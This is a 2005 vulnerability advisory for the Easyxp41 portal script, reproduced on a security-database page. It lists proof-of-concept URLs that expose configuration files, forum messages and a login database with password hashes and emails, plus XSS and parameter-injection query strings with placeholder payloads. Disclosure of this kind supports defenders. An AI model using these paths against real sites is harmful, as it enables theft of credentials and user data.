Lucene search
Easyxp41.txt
ποΈΒ 05 Aug 2005Β 00:00:00Reported byΒ FalconDeOroTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 23Β Views
XSS flaws and data disclosure in Easyxp41, Easyxp41 contains flaws enabling data disclosure and XSS attacks, no solution available, discovered on 26-07-2005
Show more
`XSS flaws and data disclosure in Easyxp41
################################################
XSS flaws and data dliclosure in Easyxp41
vendor url: http://www.easypx41.be/
advisory: http://falcondeoro.blogspot.com/2005/07/
xss-flaws-and-data-disclosure-in.html
vendor notify: Yes exploit available: Yes
##################################################
Easyxp41 es a free script to make web portal.Yo can run it very
easy.Easyxp41 , contains very flaw that open direct files and you can
seethe contain to it.
###########
verions
###########
CMS full
CMS test
###############
Solution
###############
No solution at this time !!
###################
Timeline
###################
Discovered: 26-07-2005
Vendor notify:29-07-2005
Disclosure:29-07-2005
############
proof of concepts
############
################################################
information disclosure in /forum/ folder:
#########################################
http://[victim]/modules/forum/cfg/
http://[victim]/modules/forum/db/
http://[victim]/modules/forum/msg/
http://[victim]/modules/forum/admin/index.php
http://[victim]/modules/forum/msg/1103495330.dat
#############
information disclosure in /login/ folder:
#############
http://[victim]/modules/login/
http://[victim]/modules/login/login.php
http://[victim]/modules/login/admin/option.php
http://[victim]/modules/login/cfg/modules.cfg
http://[victim]/cfg/config.cfg
http://[victim]/mesdocuments/
http://[victim]/modules/news/
#############
Cross-site scripting & variable injections.
#############
http://[victim]/index.php?pg=&L=[variable-injection]&H=[variable-injection]
http://[victim]/index.php?pg=[change-url]&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=Forum%20de%20dΓ©monstration.&msg=1103495330.dat&pgfull[variable-injection]
http://[victim]/index.php?pg=http://google.fr&pgtype=iframe&L=500&H=500
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[Code-XSS]
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[Code-XSS]&pgfull
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]&pgfull[variable-injection]
http://[victim]/index.php?pg=modules/forum/viewprofil.php&membres=[variable-injection]
Bad definition to variable forum = , with the flaw to up
:modules/forum/msg we can read the messages without be identify in
PHP:
http://[victim]/index.php?pg=modules/forum/viewtopic.php&Forum=[change-or-variable-injection].&msg=1103495330.dat&pgfull
##################
Name to file .dat to contain messages forum disclosure
http://[victim]/modules/forum/db/rep.db
##########################
User and password hash disclosure
http://[victim]modules/login/db/login.db
##########################
user email disclosuremodules/login/db/login.db
############################# Βnd ##########################
Thxs to Lostmon for support ([email protected]) http://lostmon.blogspot.com/
--
Atentamente:
FalconDeOro (falcondeoro.blogspot.com)
Web-Blog: http://falcondeoro.blogspot.com
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. ContactΒ us for a demo andΒ discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo05 Aug 2005 00:00Current
7.4High risk
Vulners AI Score7.4